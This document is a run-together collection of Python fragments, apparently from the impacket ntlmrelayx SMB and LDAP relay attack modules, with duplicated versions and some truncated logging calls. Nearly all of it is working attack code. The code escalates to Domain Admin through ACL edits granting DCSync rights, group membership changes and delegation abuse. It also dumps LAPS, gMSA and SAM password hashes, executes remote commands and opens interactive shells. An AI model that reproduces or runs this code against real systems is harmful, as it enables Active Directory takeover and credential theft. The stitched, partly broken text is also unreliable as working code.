def __init__(self, config, SMBClient, username): ProtocolAttack.__init__(self, config, SMBClient, username) if isinstance(SMBClient, smb.SMB) or isinstance(SMBClient, smb3.SMB3): self.__SMBConnection = SMBConnection(existingConnection=SMBClient) else: self.__SMBConnection = SMBClient self.__answerTMP = '' if self.config.interactive: #Launch locally listening interactive shell self.tcpshell = TcpShell() else: self.tcpshell = None if self.config.exeFile is not None: self.installService = serviceinstall.ServiceInstall(SMBClient, self.config.exeFile)
def __init__(self, config, LDAPClient, username): self.computerName = '' if config.addcomputer == 'Rand' else config.addcomputer ProtocolAttack.__init__(self, config, LDAPClient, username) if self.config.interactive: # Launch locally listening interactive shell. self.tcp_shell = TcpShell()
class LDAPAttack(ProtocolAttack): """ This is the default LDAP attack. It checks the privileges of the relayed account and performs a domaindump if the user does not have administrative privileges. If the user is an Enterprise or Domain admin, a new user is added to escalate to DA. """ PLUGIN_NAMES = ["LDAP", "LDAPS"] # ACL constants # When reading, these constants are actually represented by # the following for Active Directory specific Access Masks # Reference: GENERIC_READ = 0x00020094 GENERIC_WRITE = 0x00020028 GENERIC_EXECUTE = 0x00020004 GENERIC_ALL = 0x000F01FF def __init__(self, config, LDAPClient, username): self.computerName = '' if config.addcomputer == 'Rand' else config.addcomputer ProtocolAttack.__init__(self, config, LDAPClient, username) if self.config.interactive: # Launch locally listening interactive shell. self.tcp_shell = TcpShell() def addComputer(self, parent, domainDumper): """ Add a new computer. Parent is preferably CN=computers,DC=Domain,DC=local, but can also be an OU or other container where we have write privileges """ global alreadyAddedComputer if alreadyAddedComputer: LOG.error('New computer already added. Refusing to add another') return # Random password newPassword = ''.join( random.choice(string.ascii_letters + string.digits + string.punctuation) for _ in range(15)) # Get the domain we are in domaindn = domainDumper.root domain = re.sub(',DC=', '.', domaindn[domaindn.find('DC='):], flags=re.I)[3:] computerName = self.computerName if not computerName: # Random computername newComputer = ( ''.join(random.choice(string.ascii_letters) for _ in range(8)) + '$').upper() else: newComputer = computerName if computerName.endswith( '$') else computerName + '$' computerHostname = newComputer[:-1] newComputerDn = ('CN=%s,%s' % (computerHostname, parent)).encode('utf-8') # Default computer SPNs spns = [ 'HOST/%s' % computerHostname, 'HOST/%s.%s' % (computerHostname, domain), 'RestrictedKrbHost/%s' % computerHostname, 'RestrictedKrbHost/%s.%s' % (computerHostname, domain), ] ucd = { 'dnsHostName': '%s.%s' % (computerHostname, domain), 'userAccountControl': 4096, 'servicePrincipalName': spns, 'sAMAccountName': newComputer, 'unicodePwd': '"{}"'.format(newPassword).encode('utf-16-le') } LOG.debug('New computer info %s', ucd)'Attempting to create computer in: %s', parent) res = self.client.add( newComputerDn.decode('utf-8'), ['top', 'person', 'organizationalPerson', 'user', 'computer'], ucd) if not res: # Adding computers requires LDAPS if self.client.result[ 'result'] == RESULT_UNWILLING_TO_PERFORM and not self.client.server.ssl: LOG.error( 'Failed to add a new computer. The server denied the operation. Try relaying to LDAP with TLS enabled (ldaps) or escalating an existing account.' ) else: LOG.error('Failed to add a new computer: %s' % str(self.client.result)) return False else: 'Adding new computer with username: %s and password: %s result: OK' % (newComputer, newPassword)) alreadyAddedComputer = True # Return the SAM name return newComputer def addUser(self, parent, domainDumper): """ Add a new user. Parent is preferably CN=Users,DC=Domain,DC=local, but can also be an OU or other container where we have write privileges """ global alreadyEscalated if alreadyEscalated: LOG.error('New user already added. Refusing to add another') return # Random password newPassword = ''.join( random.choice(string.ascii_letters + string.digits + string.punctuation) for _ in range(15)) # Random username newUser = ''.join( random.choice(string.ascii_letters) for _ in range(10)) newUserDn = 'CN=%s,%s' % (newUser, parent) ucd = { 'objectCategory': 'CN=Person,CN=Schema,CN=Configuration,%s' % domainDumper.root, 'distinguishedName': newUserDn, 'cn': newUser, 'sn': newUser, 'givenName': newUser, 'displayName': newUser, 'name': newUser, 'userAccountControl': 512, 'accountExpires': '0', 'sAMAccountName': newUser, 'unicodePwd': '"{}"'.format(newPassword).encode('utf-16-le') }'Attempting to create user in: %s', parent) res = self.client.add( newUserDn, ['top', 'person', 'organizationalPerson', 'user'], ucd) if not res: # Adding users requires LDAPS if self.client.result[ 'result'] == RESULT_UNWILLING_TO_PERFORM and not self.client.server.ssl: LOG.error( 'Failed to add a new user. The server denied the operation. Try relaying to LDAP with TLS enabled (ldaps) or escalating an existing user.' ) else: LOG.error('Failed to add a new user: %s' % str(self.client.result)) return False else: 'Adding new user with username: %s and password: %s result: OK' % (newUser, newPassword)) # Return the DN return newUserDn def addUserToGroup(self, userDn, domainDumper, groupDn): global alreadyEscalated # For display only groupName = groupDn.split(',')[0][3:] userName = userDn.split(',')[0][3:] # Now add the user as a member to this group res = self.client.modify(groupDn, {'member': [(ldap3.MODIFY_ADD, [userDn])]}) if res:'Adding user: %s to group %s result: OK' % (userName, groupName))'Privilege escalation succesful, shutting down...') alreadyEscalated = True _thread.interrupt_main() else: LOG.error('Failed to add user to %s group: %s' % (groupName, str(self.client.result))) def delegateAttack(self, usersam, targetsam, domainDumper, sid): global delegatePerformed if targetsam in delegatePerformed: 'Delegate attack already performed for this computer, skipping' ) return if not usersam: usersam = self.addComputer('CN=Computers,%s' % domainDumper.root, domainDumper) self.config.escalateuser = usersam if not sid: # Get escalate user sid result = self.getUserInfo(domainDumper, usersam) if not result: LOG.error('User to escalate does not exist!') return escalate_sid = str(result[1]) else: escalate_sid = usersam # Get target computer DN result = self.getUserInfo(domainDumper, targetsam) if not result: LOG.error('Computer to modify does not exist! (wrong domain?)') return target_dn = result[0], '(objectClass=*)', search_scope=ldap3.BASE, attributes=[ 'SAMAccountName', 'objectSid', 'msDS-AllowedToActOnBehalfOfOtherIdentity' ]) targetuser = None for entry in self.client.response: if entry['type'] != 'searchResEntry': continue targetuser = entry if not targetuser: LOG.error('Could not query target user properties') return try: sd = ldaptypes.SR_SECURITY_DESCRIPTOR( data=targetuser['raw_attributes'] ['msDS-AllowedToActOnBehalfOfOtherIdentity'][0]) LOG.debug('Currently allowed sids:') for ace in sd['Dacl'].aces: LOG.debug(' %s' % ace['Ace']['Sid'].formatCanonical()) except IndexError: # Create DACL manually sd = create_empty_sd() sd['Dacl'].aces.append(create_allow_ace(escalate_sid)) self.client.modify( targetuser['dn'], { 'msDS-AllowedToActOnBehalfOfOtherIdentity': [ldap3.MODIFY_REPLACE, [sd.getData()]] }) if self.client.result['result'] == 0:'Delegation rights modified succesfully!')'%s can now impersonate users on %s via S4U2Proxy', usersam, targetsam) delegatePerformed.append(targetsam) else: if self.client.result['result'] == 50: LOG.error( 'Could not modify object, the server reports insufficient rights: %s', self.client.result['message']) elif self.client.result['result'] == 19: LOG.error( 'Could not modify object, the server reports a constrained violation: %s', self.client.result['message']) else: LOG.error('The server returned an error: %s', self.client.result['message']) return def aclAttack(self, userDn, domainDumper): global alreadyEscalated if alreadyEscalated: LOG.error('ACL attack already performed. Refusing to continue') return # Dictionary for restore data restoredata = {} # Query for the sid of our user, '(objectCategory=user)', attributes=['sAMAccountName', 'objectSid']) entry = self.client.entries[0] username = entry['sAMAccountName'].value usersid = entry['objectSid'].value LOG.debug('Found sid for user %s: %s' % (username, usersid)) # Set SD flags to only query for DACL controls = security_descriptor_control(sdflags=0x04) alreadyEscalated = True'Querying domain security descriptor') domainDumper.root, '(&(objectCategory=domain))', attributes=['SAMAccountName', 'nTSecurityDescriptor'], controls=controls) entry = self.client.entries[0] secDescData = entry['nTSecurityDescriptor'].raw_values[0] secDesc = ldaptypes.SR_SECURITY_DESCRIPTOR(data=secDescData) # Save old SD for restore purposes restoredata['old_sd'] = binascii.hexlify(secDescData).decode('utf-8') restoredata['target_sid'] = usersid secDesc['Dacl']['Data'].append( create_object_ace('1131f6aa-9c07-11d1-f79f-00c04fc2dcd2', usersid)) secDesc['Dacl']['Data'].append( create_object_ace('1131f6ad-9c07-11d1-f79f-00c04fc2dcd2', usersid)) dn = entry.entry_dn data = secDesc.getData() self.client.modify( dn, {'nTSecurityDescriptor': (ldap3.MODIFY_REPLACE, [data])}, controls=controls) if self.client.result['result'] == 0: alreadyEscalated = True 'Success! User %s now has Replication-Get-Changes-All privileges on the domain', username)'Try using DCSync with and this user :)') # Query the SD again to see what AD made of it domainDumper.root, '(&(objectCategory=domain))', attributes=['SAMAccountName', 'nTSecurityDescriptor'], controls=controls) entry = self.client.entries[0] newSD = entry['nTSecurityDescriptor'].raw_values[0] # Save this to restore the SD later on restoredata['target_dn'] = dn restoredata['new_sd'] = binascii.hexlify(newSD).decode('utf-8') restoredata['success'] = True self.writeRestoreData(restoredata, dn) return True else: LOG.error('Error when updating ACL: %s' % self.client.result) return False def writeRestoreData(self, restoredata, domaindn): output = {} domain = re.sub(',DC=', '.', domaindn[domaindn.find('DC='):], flags=re.I)[3:] output['config'] = { 'server':, 'domain': domain } output['history'] = [{ 'operation': 'add_domain_sync', 'data': restoredata, 'contextuser': self.username }] now = filename = 'aclpwn-%s.restore' % now.strftime("%Y%m%d-%H%M%S") # Save the json to file with, 'w', 'utf-8') as outfile: json.dump(output, outfile)'Saved restore state to %s', filename) def validatePrivileges(self, uname, domainDumper): # Find the user's DN membersids = [] sidmapping = {} privs = { 'create': False, # Whether we can create users 'createIn': None, # Where we can create users 'escalateViaGroup': False, # Whether we can escalate via a group 'escalateGroup': None, # The group we can escalate via 'aclEscalate': False, # Whether we can escalate via ACL on the domain object 'aclEscalateIn': None # The object which ACL we can edit }, '(sAMAccountName=%s)' % escape_filter_chars(uname), attributes=['objectSid', 'primaryGroupId']) user = self.client.entries[0] usersid = user['objectSid'].value sidmapping[usersid] = user.entry_dn membersids.append(usersid) # The groups the user is a member of, '(member:1.2.840.113556.1.4.1941:=%s)' % escape_filter_chars(user.entry_dn), attributes=['name', 'objectSid']) LOG.debug('User is a member of: %s' % self.client.entries) for entry in self.client.entries: sidmapping[entry['objectSid'].value] = entry.entry_dn membersids.append(entry['objectSid'].value) # Also search by primarygroupid # First get domain SID, '(objectClass=domain)', attributes=['objectSid']) domainsid = self.client.entries[0]['objectSid'].value gid = user['primaryGroupId'].value # Now search for this group by SID domainDumper.root, '(objectSid=%s-%d)' % (domainsid, gid), attributes=['name', 'objectSid', 'distinguishedName']) group = self.client.entries[0] LOG.debug('User is a member of: %s' % self.client.entries) # Add the group sid of the primary group to the list sidmapping[group['objectSid'].value] = group.entry_dn membersids.append(group['objectSid'].value) controls = security_descriptor_control( sdflags=0x05) # Query Owner and Dacl # Now we have all the SIDs applicable to this user, now enumerate the privileges of domains and OUs entries = self.client.extend.standard.paged_search( domainDumper.root, '(|(objectClass=domain)(objectClass=organizationalUnit))', attributes=['nTSecurityDescriptor', 'objectClass'], controls=controls, generator=True) self.checkSecurityDescriptors(entries, privs, membersids, sidmapping, domainDumper) # Also get the privileges on the default Users container entries = self.client.extend.standard.paged_search( domainDumper.root, '(&(cn=Users)(objectClass=container))', attributes=['nTSecurityDescriptor', 'objectClass'], controls=controls, generator=True) self.checkSecurityDescriptors(entries, privs, membersids, sidmapping, domainDumper) # Interesting groups we'd like to be a member of, in order of preference interestingGroups = [ '%s-%d' % (domainsid, 519), # Enterprise admins '%s-%d' % (domainsid, 512), # Domain admins 'S-1-5-32-544', # Built-in Administrators 'S-1-5-32-551', # Backup operators 'S-1-5-32-548', # Account operators ] privs['escalateViaGroup'] = False for group in interestingGroups: domainDumper.root, '(objectSid=%s)' % group, attributes=['nTSecurityDescriptor', 'objectClass'], controls=controls) groupdata = self.client.response self.checkSecurityDescriptors(groupdata, privs, membersids, sidmapping, domainDumper) if privs['escalateViaGroup']: # We have a result - exit the loop break return (usersid, privs) def getUserInfo(self, domainDumper, samname): entries =, '(sAMAccountName=%s)' % escape_filter_chars(samname), attributes=['objectSid']) try: dn = self.client.entries[0].entry_dn sid = self.client.entries[0]['objectSid'] return (dn, sid) except IndexError: LOG.error('User not found in LDAP: %s' % samname) return False def checkSecurityDescriptors(self, entries, privs, membersids, sidmapping, domainDumper): standardrights = [ self.GENERIC_ALL, self.GENERIC_WRITE, self.GENERIC_READ, ACCESS_MASK.WRITE_DACL ] for entry in entries: if entry['type'] != 'searchResEntry': continue dn = entry['dn'] try: sdData = entry['raw_attributes']['nTSecurityDescriptor'][0] except IndexError: # We don't have the privileges to read this security descriptor LOG.debug('Access to security descriptor was denied for DN %s', dn) continue hasFullControl = False secDesc = ldaptypes.SR_SECURITY_DESCRIPTOR() secDesc.fromString(sdData) if secDesc['OwnerSid'] != '' and secDesc[ 'OwnerSid'].formatCanonical() in membersids: sid = secDesc['OwnerSid'].formatCanonical() LOG.debug( 'Permission found: Full Control on %s; Reason: Owner via %s' % (dn, sidmapping[sid])) hasFullControl = True # Iterate over all the ACEs for ace in secDesc['Dacl'].aces: sid = ace['Ace']['Sid'].formatCanonical() if ace['AceType'] != ACCESS_ALLOWED_OBJECT_ACE.ACE_TYPE and ace[ 'AceType'] != ACCESS_ALLOWED_ACE.ACE_TYPE: continue if not ace.hasFlag(ACE.INHERITED_ACE) and ace.hasFlag( ACE.INHERIT_ONLY_ACE): # ACE is set on this object, but only inherited, so not applicable to us continue # Check if the ACE has restrictions on object type (inherited case) if ace['AceType'] == ACCESS_ALLOWED_OBJECT_ACE.ACE_TYPE \ and ace.hasFlag(ACE.INHERITED_ACE) \ and ace['Ace'].hasFlag(ACCESS_ALLOWED_OBJECT_ACE.ACE_INHERITED_OBJECT_TYPE_PRESENT): # Verify if the ACE applies to this object type inheritedObjectType = bin_to_string( ace['Ace']['InheritedObjectType']).lower() if not self.aceApplies( inheritedObjectType, entry['raw_attributes']['objectClass'][-1]): continue # Check for non-extended rights that may not apply to us if ace['Ace']['Mask']['Mask'] in standardrights or ace['Ace'][ 'Mask'].hasPriv(ACCESS_MASK.WRITE_DACL): # Check if this applies to our objecttype if ace['AceType'] == ACCESS_ALLOWED_OBJECT_ACE.ACE_TYPE and ace[ 'Ace'].hasFlag(ACCESS_ALLOWED_OBJECT_ACE. ACE_OBJECT_TYPE_PRESENT): objectType = bin_to_string( ace['Ace']['ObjectType']).lower() if not self.aceApplies( objectType, entry['raw_attributes']['objectClass'][-1]): # LOG.debug('ACE does not apply, only to %s', objectType) continue if sid in membersids: # Generic all if ace['Ace']['Mask'].hasPriv(self.GENERIC_ALL): ace.dump() LOG.debug( 'Permission found: Full Control on %s; Reason: GENERIC_ALL via %s' % (dn, sidmapping[sid])) hasFullControl = True if can_create_users(ace) or hasFullControl: if not hasFullControl: LOG.debug( 'Permission found: Create users in %s; Reason: Granted to %s' % (dn, sidmapping[sid])) if dn == 'CN=Users,%s' % domainDumper.root: # We can create users in the default container, this is preferred privs['create'] = True privs['createIn'] = dn else: # Could be a different OU where we have access # store it until we find a better place if privs[ 'createIn'] != 'CN=Users,%s' % domainDumper.root and b'organizationalUnit' in entry[ 'raw_attributes']['objectClass']: privs['create'] = True privs['createIn'] = dn if can_add_member(ace) or hasFullControl: if b'group' in entry['raw_attributes']['objectClass']: # We can add members to a group if not hasFullControl: LOG.debug( 'Permission found: Add member to %s; Reason: Granted to %s' % (dn, sidmapping[sid])) privs['escalateViaGroup'] = True privs['escalateGroup'] = dn if ace['Ace']['Mask'].hasPriv( ACCESS_MASK.WRITE_DACL) or hasFullControl: # Check if the ACE is an OBJECT ACE, if so the WRITE_DACL is applied to # a property, which is both weird and useless, so we skip it if ace['AceType'] == ACCESS_ALLOWED_OBJECT_ACE.ACE_TYPE \ and ace['Ace'].hasFlag(ACCESS_ALLOWED_OBJECT_ACE.ACE_OBJECT_TYPE_PRESENT): # LOG.debug('Skipping WRITE_DACL since it has an ObjectType set') continue if not hasFullControl: LOG.debug( 'Permission found: Write Dacl of %s; Reason: Granted to %s' % (dn, sidmapping[sid])) # We can modify the domain Dacl if b'domain' in entry['raw_attributes']['objectClass']: privs['aclEscalate'] = True privs['aclEscalateIn'] = dn @staticmethod def aceApplies(ace_guid, object_class): ''' Checks if an ACE applies to this object (based on object classes). Note that this function assumes you already verified that InheritedObjectType is set (via the flag). If this is not set, the ACE applies to all object types. ''' try: our_ace_guid = OBJECTTYPE_GUID_MAP[object_class] except KeyError: return False if ace_guid == our_ace_guid: return True # If none of these match, the ACE does not apply to this object return False def run(self):'dc=vulnerable,dc=contoso,dc=com', '(objectclass=person)') #print self.client.entries global dumpedDomain # Set up a default config domainDumpConfig = ldapdomaindump.domainDumpConfig() # Change the output directory to configured rootdir domainDumpConfig.basepath = self.config.lootdir # Create new dumper object domainDumper = ldapdomaindump.domainDumper(self.client.server, self.client, domainDumpConfig) if self.config.interactive: if self.tcp_shell is not None: 'Started interactive Ldap shell via TCP on' % self.tcp_shell.port) # Start listening and launch interactive shell. self.tcp_shell.listen() ldap_shell = LdapShell(self.tcp_shell, domainDumper, self.client) ldap_shell.cmdloop() return # If specified validate the user's privileges. This might take a while on large domains but will # identify the proper containers for escalating via the different techniques. if self.config.validateprivs: 'Enumerating relayed user\'s privileges. This may take a while on large domains' ) userSid, privs = self.validatePrivileges(self.username, domainDumper) if privs['create']:'User privileges found: Create user') if privs['escalateViaGroup']: name = privs['escalateGroup'].split(',')[0][3:] 'User privileges found: Adding user to a privileged group (%s)' % name) if privs['aclEscalate']:'User privileges found: Modifying domain ACL') # If validation of privileges is not desired, we assumed that the user has permissions to escalate # an existing user via ACL attacks. else: 'Assuming relayed user has privileges to escalate a user via ACL attack' ) privs = dict() privs['create'] = False privs['aclEscalate'] = True privs['escalateViaGroup'] = False # We prefer ACL escalation since it is more quiet if self.config.aclattack and privs['aclEscalate']: LOG.debug('Performing ACL attack') if self.config.escalateuser: # We can escalate an existing user result = self.getUserInfo(domainDumper, self.config.escalateuser) # Unless that account does not exist of course if not result: LOG.error('Unable to escalate without a valid user.') else: userDn, userSid = result # Perform the ACL attack self.aclAttack(userDn, domainDumper) elif privs['create']: # Create a nice shiny new user for the escalation userDn = self.addUser(privs['createIn'], domainDumper) if not userDn: LOG.error('Unable to escalate without a valid user.') # Perform the ACL attack else: self.aclAttack(userDn, domainDumper) else: LOG.error('Cannot perform ACL escalation because we do not have create user '\ 'privileges. Specify a user to assign privileges to with --escalate-user') # If we can't ACL escalate, try adding us to a privileged group if self.config.addda and privs['escalateViaGroup']: LOG.debug('Performing Group attack') if self.config.escalateuser: # We can escalate an existing user result = self.getUserInfo(domainDumper, self.config.escalateuser) # Unless that account does not exist of course if not result: LOG.error('Unable to escalate without a valid user.') # Perform the Group attack else: userDn, userSid = result self.addUserToGroup(userDn, domainDumper, privs['escalateGroup']) elif privs['create']: # Create a nice shiny new user for the escalation userDn = self.addUser(privs['createIn'], domainDumper) if not userDn: LOG.error( 'Unable to escalate without a valid user, aborting.') # Perform the Group attack else: self.addUserToGroup(userDn, domainDumper, privs['escalateGroup']) else: LOG.error('Cannot perform ACL escalation because we do not have create user '\ 'privileges. Specify a user to assign privileges to with --escalate-user') # Dump LAPS Passwords if self.config.dumplaps:"Attempting to dump LAPS passwords") success = domainDumper.root, '(&(objectCategory=computer))', search_scope=ldap3.SUBTREE, attributes=['DistinguishedName', 'ms-MCS-AdmPwd']) if success: fd = None filename = "laps-dump-" + self.username + "-" + str( random.randint(0, 99999)) count = 0 for entry in self.client.response: try: dn = "DN:" + entry['attributes']['distinguishedname'] passwd = "Password:"******"a+") count += 1 LOG.debug(dn) LOG.debug(passwd) fd.write(dn) fd.write("\n") fd.write(passwd) fd.write("\n") except: continue if fd is None: "The relayed user %s does not have permissions to read any LAPS passwords" % self.username) else: "Successfully dumped %d LAPS passwords through relayed account %s" % (count, self.username)) fd.close() #Dump gMSA Passwords if self.config.dumpgmsa:"Attempting to dump gMSA passwords") success = domainDumper.root, '(&(ObjectClass=msDS-GroupManagedServiceAccount))', search_scope=ldap3.SUBTREE, attributes=['sAMAccountName', 'msDS-ManagedPassword']) if success: fd = None filename = "gmsa-dump-" + self.username + "-" + str( random.randint(0, 99999)) count = 0 for entry in self.client.response: try: sam = entry['attributes']['sAMAccountName'] data = entry['attributes']['msDS-ManagedPassword'] blob = MSDS_MANAGEDPASSWORD_BLOB() blob.fromString(data) hash = hash.update(blob['CurrentPassword'][:-2]) passwd = binascii.hexlify( hash.digest()).decode("utf-8") userpass = sam + ':::' + passwd count += 1 if fd is None: fd = open(filename, "a+") fd.write(userpass) fd.write("\n") except: continue if fd is None: "The relayed user %s does not have permissions to read any gMSA passwords" % self.username) else: "Successfully dumped %d gMSA passwords through relayed account %s" % (count, self.username)) fd.close() # Perform the Delegate attack if it is enabled and we relayed a computer account if self.config.delegateaccess and self.username[-1] == '$': self.delegateAttack(self.config.escalateuser, self.username, domainDumper, self.config.sid) return # Add a new computer if that is requested # privileges required are not yet enumerated, neither is ms-ds-MachineAccountQuota if self.config.addcomputer:, "(ObjectClass=domain)", attributes=['wellKnownObjects']) # Computer well-known GUID # computerscontainer = [ entry.decode('utf-8').split(":")[-1] for entry in self.client.entries[0]["wellKnownObjects"] if b"AA312825768811D1ADED00C04FD8D5CD" in entry ][0] LOG.debug("Computer container is {}".format(computerscontainer)) self.addComputer(computerscontainer, domainDumper) return # Last attack, dump the domain if no special privileges are present if not dumpedDomain and self.config.dumpdomain: # Do this before the dump is complete because of the time this can take dumpedDomain = True'Dumping domain info for first time') domainDumper.domainDump()'Domain info dumped into lootdir!')
class SMBAttack(Thread): def __init__(self, config, SMBClient, username): Thread.__init__(self) self.daemon = True if isinstance(SMBClient, smb.SMB) or isinstance(SMBClient, smb3.SMB3): self.__SMBConnection = SMBConnection(existingConnection = SMBClient) else: self.__SMBConnection = SMBClient self.config = config self.__answerTMP = '' if self.config.interactive: #Launch locally listening interactive shell self.tcpshell = TcpShell() else: self.tcpshell = None if self.config.exeFile is not None: self.installService = serviceinstall.ServiceInstall(SMBClient, self.config.exeFile) def __answer(self, data): self.__answerTMP += data def run(self): # Here PUT YOUR CODE! if self.tcpshell is not None:'Started interactive SMB client shell via TCP on' % self.tcpshell.port) #Start listening and launch interactive shell self.tcpshell.listen() = MiniImpacketShell(self.__SMBConnection,self.tcpshell.socketfile) return if self.config.exeFile is not None: result = self.installService.install() if result is True:"Service Installed.. CONNECT!") self.installService.uninstall() else: from impacket.examples.secretsdump import RemoteOperations, SAMHashes samHashes = None try: # We have to add some flags just in case the original client did not # Why? needed for avoiding INVALID_PARAMETER flags1, flags2 = self.__SMBConnection.getSMBServer().get_flags() flags2 |= smb.SMB.FLAGS2_LONG_NAMES self.__SMBConnection.getSMBServer().set_flags(flags2=flags2) remoteOps = RemoteOperations(self.__SMBConnection, False) remoteOps.enableRegistry() except Exception, e: # Something wen't wrong, most probably we don't have access as admin. aborting logging.error(str(e)) return try: if self.config.command is not None: remoteOps._RemoteOperations__executeRemote(self.config.command)"Executed specified command on host: %s", self.__SMBConnection.getRemoteHost()) self.__answerTMP = '' self.__SMBConnection.getFile('ADMIN$', 'Temp\\__output', self.__answer) self.__SMBConnection.deleteFile('ADMIN$', 'Temp\\__output') print self.__answerTMP.decode(self.config.encoding, 'replace') else: bootKey = remoteOps.getBootKey() remoteOps._RemoteOperations__serviceDeleted = True samFileName = remoteOps.saveSAM() samHashes = SAMHashes(samFileName, bootKey, isRemote = True) samHashes.dump() samHashes.export(self.__SMBConnection.getRemoteHost()+'_samhashes')"Done dumping SAM hashes for host: %s", self.__SMBConnection.getRemoteHost()) except Exception, e: logging.error(str(e)) finally:
class SMBAttack(ProtocolAttack): """ This is the SMB default attack class. It will either dump the hashes from the remote target, or open an interactive shell if the -i option is specified. """ PLUGIN_NAMES = ["SMB"] def __init__(self, config, SMBClient, username): ProtocolAttack.__init__(self, config, SMBClient, username) if isinstance(SMBClient, smb.SMB) or isinstance(SMBClient, smb3.SMB3): self.__SMBConnection = SMBConnection(existingConnection=SMBClient) else: self.__SMBConnection = SMBClient self.__answerTMP = '' if self.config.interactive: #Launch locally listening interactive shell self.tcpshell = TcpShell() else: self.tcpshell = None if self.config.exeFile is not None: self.installService = serviceinstall.ServiceInstall(SMBClient, self.config.exeFile) def __answer(self, data): self.__answerTMP += data def run(self): # Here PUT YOUR CODE! if self.tcpshell is not None:'Started interactive SMB client shell via TCP on' % self.tcpshell.port) #Start listening and launch interactive shell self.tcpshell.listen() = MiniImpacketShell(self.__SMBConnection,self.tcpshell.socketfile) return if self.config.exeFile is not None: result = self.installService.install() if result is True:"Service Installed.. CONNECT!") self.installService.uninstall() else: from impacket.examples.secretsdump import RemoteOperations, SAMHashes from impacket.examples.ntlmrelayx.utils.enum import EnumLocalAdmins samHashes = None try: # We have to add some flags just in case the original client did not # Why? needed for avoiding INVALID_PARAMETER if self.__SMBConnection.getDialect() == smb.SMB_DIALECT: flags1, flags2 = self.__SMBConnection.getSMBServer().get_flags() flags2 |= smb.SMB.FLAGS2_LONG_NAMES self.__SMBConnection.getSMBServer().set_flags(flags2=flags2) remoteOps = RemoteOperations(self.__SMBConnection, False) remoteOps.enableRegistry() except Exception, e: if "rpc_s_access_denied" in str(e): # user doesn't have correct privileges if self.config.enumLocalAdmins:"Relayed user doesn't have admin on {}. Attempting to enumerate users who do...".format(self.__SMBConnection.getRemoteHost().encode(self.config.encoding))) enumLocalAdmins = EnumLocalAdmins(self.__SMBConnection) try: localAdminSids, localAdminNames = enumLocalAdmins.getLocalAdmins()"Host {} has the following local admins (hint: try relaying one of them here...)".format(self.__SMBConnection.getRemoteHost().encode(self.config.encoding))) for name in localAdminNames:"Host {} local admin member: {} ".format(self.__SMBConnection.getRemoteHost().encode(self.config.encoding), name)) except DCERPCException, e:"SAMR access denied") return # Something else went wrong. aborting LOG.error(str(e)) return try: if self.config.command is not None: remoteOps._RemoteOperations__executeRemote(self.config.command)"Executed specified command on host: %s", self.__SMBConnection.getRemoteHost()) self.__answerTMP = '' self.__SMBConnection.getFile('ADMIN$', 'Temp\\__output', self.__answer) self.__SMBConnection.deleteFile('ADMIN$', 'Temp\\__output') print self.__answerTMP.decode(self.config.encoding, 'replace') else: bootKey = remoteOps.getBootKey() remoteOps._RemoteOperations__serviceDeleted = True samFileName = remoteOps.saveSAM() samHashes = SAMHashes(samFileName, bootKey, isRemote = True) samHashes.dump() samHashes.export(self.__SMBConnection.getRemoteHost()+'_samhashes')"Done dumping SAM hashes for host: %s", self.__SMBConnection.getRemoteHost()) except Exception, e: LOG.error(str(e))
class SMBAttack(Thread): def __init__(self, config, SMBClient, username): Thread.__init__(self) self.daemon = True if isinstance(SMBClient, smb.SMB) or isinstance(SMBClient, smb3.SMB3): self.__SMBConnection = SMBConnection(existingConnection=SMBClient) else: self.__SMBConnection = SMBClient self.config = config self.__answerTMP = "" if self.config.interactive: # Launch locally listening interactive shell self.tcpshell = TcpShell() else: self.tcpshell = None if self.config.exeFile is not None: self.installService = serviceinstall.ServiceInstall(SMBClient, self.config.exeFile) def __answer(self, data): self.__answerTMP += data def run(self): # Here PUT YOUR CODE! if self.tcpshell is not None:"Started interactive SMB client shell via TCP on" % self.tcpshell.port) # Start listening and launch interactive shell self.tcpshell.listen() = MiniImpacketShell(self.__SMBConnection, self.tcpshell.socketfile) return if self.config.exeFile is not None: result = self.installService.install() if result is True:"Service Installed.. CONNECT!") self.installService.uninstall() else: from impacket.examples.secretsdump import RemoteOperations, SAMHashes samHashes = None try: # We have to add some flags just in case the original client did not # Why? needed for avoiding INVALID_PARAMETER flags1, flags2 = self.__SMBConnection.getSMBServer().get_flags() flags2 |= smb.SMB.FLAGS2_LONG_NAMES self.__SMBConnection.getSMBServer().set_flags(flags2=flags2) remoteOps = RemoteOperations(self.__SMBConnection, False) remoteOps.enableRegistry() except Exception, e: # Something wen't wrong, most probably we don't have access as admin. aborting logging.error(str(e)) return try: if self.config.command is not None: remoteOps._RemoteOperations__executeRemote(self.config.command)"Executed specified command on host: %s", self.__SMBConnection.getRemoteHost()) self.__answerTMP = "" self.__SMBConnection.getFile("ADMIN$", "Temp\\__output", self.__answer) self.__SMBConnection.deleteFile("ADMIN$", "Temp\\__output") else: bootKey = remoteOps.getBootKey() remoteOps._RemoteOperations__serviceDeleted = True samFileName = remoteOps.saveSAM() samHashes = SAMHashes(samFileName, bootKey, isRemote=True) samHashes.dump() samHashes.export(self.__SMBConnection.getRemoteHost() + "_samhashes")"Done dumping SAM hashes for host: %s", self.__SMBConnection.getRemoteHost()) except Exception, e: logging.error(str(e)) finally: